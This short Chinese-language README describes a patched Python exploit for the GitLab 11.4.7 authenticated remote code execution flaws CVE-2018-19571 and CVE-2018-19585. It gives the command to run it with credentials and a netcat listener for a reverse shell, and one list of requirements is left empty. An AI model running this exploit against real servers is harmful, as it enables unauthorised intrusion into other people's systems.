这是Python脚本的修复版本,用于利用CVE-2018-19571和CVE-2018-19585(GitLab 11.4.7 - 经过身份验证的远程代码执行),该脚本可在 https://www.exploit-db.com/exploits/49263 (Python 3.9) 处获取。
编辑脚本,将其中的目标地址替换为实际目标地址。
另外请注意,您需要:
然后按以下方式执行脚本:
python3 49263.py -U username -P password -l local-ip -p local-port-for-netcat-listener